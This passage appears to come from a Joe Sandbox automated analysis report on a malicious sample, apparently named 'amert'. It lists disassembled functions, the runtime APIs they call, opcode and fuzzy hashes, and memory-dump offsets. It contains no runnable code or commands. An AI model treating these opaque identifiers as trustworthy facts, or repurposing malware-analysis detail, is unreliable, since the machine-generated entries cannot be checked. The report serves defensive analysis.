                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: 9d509e5301b94853f5ae8137573dea76e83cc6a95a9a1bbe50b74d81852c42a0
                                                                                                                                                                                                                                        • Instruction ID: 46fd0107e4f4bc92c60b1003f627a90a202a768d29deb1befe7400665b69d601
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d509e5301b94853f5ae8137573dea76e83cc6a95a9a1bbe50b74d81852c42a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4621837590020DAFDF12EFA4CC41ABEBBB8EF09710F004019F505BB251D7399D019B91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00376AB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __Mtx_init_in_situ.LIBCPMT ref: 00376CDC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_init_in_situ
                                                                                                                                                                                                                                        • String ID: Pu7$`-6
                                                                                                                                                                                                                                        • API String ID: 3366076730-2118185490
                                                                                                                                                                                                                                        • Opcode ID: e1bc5a2c75cbdf45bbbc04d27554c5b002dd45830f82bb15e044b7d01b066434
                                                                                                                                                                                                                                        • Instruction ID: 7345348988cf6aa906f82ea05d1fce316ff54a2542a5ddbd70e9433dc96d9388
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1bc5a2c75cbdf45bbbc04d27554c5b002dd45830f82bb15e044b7d01b066434
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26A148B4A01B158FDB22CF69C895B9EBBF0EF49700F198159E819AB351E7799D01CF80
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 003788A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 0-111699406
                                                                                                                                                                                                                                        • Opcode ID: c6fe4f1744d321aa517bd6f18b1f550fbb7845caa7fbf11b9a2074c244113344
                                                                                                                                                                                                                                        • Instruction ID: f83b4d03f03c0eb91aaaae5d44486e940a6502de610198da07ce100fb0f7690f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6fe4f1744d321aa517bd6f18b1f550fbb7845caa7fbf11b9a2074c244113344
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E511972A001189BCF26DFACCC459AEB7A8EF45350F158679E919EB341DB34EE10C791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00362360 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0036239E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2659868963-111699406
                                                                                                                                                                                                                                        • Opcode ID: 62b42e79d86f5d1d3d56e373717bffc79ecdc30018bc5d4d0377fb8d949b0864
                                                                                                                                                                                                                                        • Instruction ID: 2ccc9a989b0b2febe563d0a96f6623769e60355fb7fe288d95195be9fdf1846f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62b42e79d86f5d1d3d56e373717bffc79ecdc30018bc5d4d0377fb8d949b0864
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46F0E5B9C1020C6BCB15EFE8DC428CAB7ACDE12300B508935F654EB500F7B0F6488791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00362440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00362472
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2659868963-111699406
                                                                                                                                                                                                                                        • Opcode ID: d25f0bce36d7359d5291e371303660d45e92c0c396de68ae9a7b7791c7f8fb5a
                                                                                                                                                                                                                                        • Instruction ID: 7cba00a89707369ee7f0810c6a8c69eea6dcb62c00eb55f64034764654449552
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d25f0bce36d7359d5291e371303660d45e92c0c396de68ae9a7b7791c7f8fb5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57F0A775D1020DEFC715DFA8D8419CEBBF8EF56300F1082BEE445AB201EB716A548B95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%